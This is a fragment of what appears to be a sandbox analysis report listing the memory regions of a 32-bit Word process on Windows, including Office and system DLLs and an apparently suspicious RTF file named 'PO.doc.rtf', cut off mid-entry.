"\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 393 start_va = 0x70a10000 end_va = 0x70a92fff monitored = 0 entry_point = 0x70a4791c region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 394 start_va = 0x70aa0000 end_va = 0x72701fff monitored = 0 entry_point = 0x70aa1000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 395 start_va = 0x72710000 end_va = 0x72712fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll") Region: id = 396 start_va = 0x72720000 end_va = 0x72722fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 397 start_va = 0x72730000 end_va = 0x72732fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 398 start_va = 0x72740000 end_va = 0x72742fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 399 start_va = 0x72750000 end_va = 0x72752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll") Region: id = 400 start_va = 0x72760000 end_va = 0x72762fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 401 start_va = 0x72770000 end_va = 0x7284bfff monitored = 0 entry_point = 0x7279c130 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\ucrtbase.dll") Region: id = 402 start_va = 0x72850000 end_va = 0x72866fff monitored = 0 entry_point = 0x72851c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 403 start_va = 0x72870000 end_va = 0x7293afff monitored = 0 entry_point = 0x72886a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 404 start_va = 0x72940000 end_va = 0x729a4fff monitored = 0 entry_point = 0x7295fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 405 start_va = 0x729b0000 end_va = 0x72b64fff monitored = 0 entry_point = 0x72aa3d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 406 start_va = 0x72d40000 end_va = 0x72ef8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 407 start_va = 0x72f00000 end_va = 0x7313ffff monitored = 0 entry_point = 0x72f066bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 408 start_va = 0x73360000 end_va = 0x73362fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 409 start_va = 0x73370000 end_va = 0x73372fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 410 start_va = 0x73380000 end_va = 0x73382fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 411 start_va = 0x73390000 end_va = 0x73392fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 412 start_va = 0x733a0000 end_va = 0x733a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 413 start_va = 0x733b0000 end_va = 0x733b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 414 start_va = 0x733c0000 end_va = 0x733c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 415 start_va = 0x733d0000 end_va = 0x733d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 416 start_va = 0x733e0000 end_va = 0x733e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 417 start_va = 0x733f0000 end_va = 0x733f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 418 start_va = 0x73400000 end_va = 0x73403fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 419 start_va = 0x73550000 end_va = 0x73564fff monitored = 0 entry_point = 0x7355b1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 420 start_va = 0x73570000 end_va = 0x735dcfff monitored = 0 entry_point = 0x735aab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 421 start_va = 0x73620000 end_va = 0x7364dfff monitored = 0 entry_point = 0x736216ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 422 start_va = 0x73f80000 end_va = 0x74074fff monitored = 0 entry_point = 0x73f90d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 423 start_va = 0x74090000 end_va = 0x74093fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 424 start_va = 0x740a0000 end_va = 0x740cefff monitored = 0 entry_point = 0x740a1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 425 start_va = 0x74150000 end_va = 0x7418afff monitored = 0 entry_point = 0x7415128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 426 start_va = 0x74190000 end_va = 0x741a6fff monitored = 0 entry_point = 0x74193573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 427 start_va = 0x741b0000 end_va = 0x741b4fff monitored = 0 entry_point = 0x741b10f6 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 428 start_va = 0x741f0000 end_va = 0x741fffff monitored = 0 entry_point = 0x741f38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 429 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 430 start_va = 0x742c0000 end_va = 0x742cdfff monitored = 0 entry_point = 0x742c1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 431 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 432 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 433 start_va = 0x74490000 end_va = 0x744b0fff monitored = 0 entry_point = 0x7449145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 434 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 435 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 436 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 437 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 438 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 439 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 440 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 441 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 442 start_va = 0x76200000 end_va = 0x76234fff monitored = 0 entry_point = 0x7620145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 443 start_va = 0x76240000 end_va = 0x76266fff monitored = 0 entry_point = 0x762458b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 444 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 445 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 446 start_va = 0x763a0000 end_va = 0x763cefff monitored = 0 entry_point = 0x763a2a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 447 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 448 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 449 start_va = 0x766c0000 end_va = 0x766cbfff monitored = 0 entry_point = 0x766c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 450 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 451 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 452 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 453 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 454 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 455 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 456 start_va = 0x76ca0000 end_va = 0x76ca4fff monitored = 0 entry_point = 0x76ca1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 457 start_va = 0x76cb0000 end_va = 0x76e4cfff monitored = 0 entry_point = 0x76cb17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 458 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 459 start_va = 0x77130000 end_va = 0x77174fff monitored = 0 entry_point = 0x771311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 460 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 461 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 462 start_va = 0x773c0000 end_va = 0x773d1fff monitored = 0 entry_point = 0x773c1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 463 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 464 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 465 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 466 start_va = 0x774b0000 end_va = 0x774b5fff monitored = 0 entry_point = 0x774b1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 467 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 468 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 469 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 470 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 471 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 472 start_va = 0x7ef70000 end_va = 0x7ef7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef70000" filename = "" Region: id = 473 start_va = 0x7ef80000 end_va = 0x7ef8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 474 start_va = 0x7ef92000 end_va = 0x7ef94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 475 start_va = 0x7ef95000 end_va = 0x7ef97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 476 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 477 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 478 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 479 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 480 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 481 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 482 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 483 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 484 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 485 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 486 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 487 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 488 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 489 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 490 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 491 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 492 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 493 start_va = 0x3820000 end_va = 0x385ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 494 start_va = 0x3b80000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 495 start_va = 0x732c0000 end_va = 0x732d6fff monitored = 0 entry_point = 0x732cd36d region_type = mapped_file name = "msohev.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msohev.dll") Region: id = 496 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 497 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 498 start_va = 0x752c0000 end_va = 0x752e4fff monitored = 0 entry_point = 0x752c2b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 499 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 500 start_va = 0x75470000 end_va = 0x755a5fff monitored = 0 entry_point = 0x75471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 501 start_va = 0x765c0000 end_va = 0x766b4fff monitored = 0 entry_point = 0x765c1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 502 start_va = 0x76e50000 end_va = 0x7704afff monitored = 0 entry_point = 0x76e522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 503 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 504 start_va = 0x35e0000 end_va = 0x365ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "po.doc.rtffb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055rtf4a8a98d3788c8c552266ddd5327e4f055rtf" filename = "\\Users\\kEecfMwgj\\Desktop\\PO.doc.rtffb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055rtf4a8a98d3788c8c552266ddd5327e4f055rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\po.doc.rtffb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055rtf4a8a98d3788c8c552266ddd5327e4f055rtf") Region: id = 505 start_va = 0x72ce0000 end_va = 0x72d3efff monitored = 0 entry_point = 0x72ce2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 506 start_va = 0x35e0000 end_va = 0x365ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{190c32d0-061d-4fbd-bc5a-b64a94267731}.tmp" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{190C32D0-061D-4FBD-BC5A-B64A94267731}.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet 